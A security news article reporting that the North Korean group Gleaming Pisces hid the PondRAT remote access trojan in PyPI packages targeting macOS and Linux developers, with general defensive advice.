A highly sophisticated threat group from North Korea has once again made headlines for its devious cyber tactics. This group, known as Gleaming Pisces by Palo Alto’s Unit 42 and Citrine Sleet by Microsoft, has been found concealing remote access malware within open source Python packages designed for macOS and Linux systems.
The North Korean advanced persistent threats (APTs) have gained notoriety for their various cyberattack methods over the years. From cryptocurrency scams to supply chain attacks, these threat actors have shown a remarkable level of creativity in their malicious activities. One of their recent strategies involves tricking unsuspecting victims into downloading malware through fake job recruitment schemes or compromised open source repositories.
Gleaming Pisces, linked to the DPRK Reconnaissance General Bureau (RGB), has been active since 2018 and is primarily motivated by financial gains. This group is known for deploying fake cryptocurrency platforms to lure victims into divulging sensitive information or downloading malicious software. Recently, Unit 42 revealed that Gleaming Pisces was responsible for injecting malicious packages into the Python Package Index (PyPI) earlier this year, which have since been removed.
The malicious packages uploaded by Gleaming Pisces to the PyPI repository appeared innocuous at first glance but contained hidden codes that would execute upon download. Once executed, these codes would trigger bash commands to install a remote access trojan (RAT) known as “PondRAT” on the victim’s system. PondRAT, a lightweight backdoor tool, allows the attackers to perform basic functions like file uploads and downloads, command execution, and checking the status of the infected machine.
What sets this malware campaign apart is the fact that the threat actors targeted macOS and Linux systems exclusively, bypassing the more commonly used Windows operating system. This strategic decision aligns with Gleaming Pisces’ focus on developers, CI/CD infrastructure, and developer workstations, which are predominantly based on macOS and Linux platforms. By tailoring their malware to these systems, the attackers increase their chances of successfully infiltrating their target environments.
The case of poisoned PyPI packages serves as a stark reminder for developers to remain vigilant against phishing attacks and suspicious software downloads. While it may be uncommon for developers to directly download obscure packages from repositories like PyPI, the integration of these packages into larger software ecosystems poses a significant risk. Security experts recommend scanning packages for potential threats, minimizing the number of dependencies, and staying informed about the latest cybersecurity trends to prevent malware infections.
As Louis Lang, the co-founder and CTO of Phylum, aptly puts it, “you’re one update away from malware.” In an increasingly interconnected digital landscape, staying informed and proactive is key to mitigating the risks posed by sophisticated threat actors like Gleaming Pisces. Developers and organizations must prioritize cybersecurity measures to safeguard their systems against evolving cyber threats.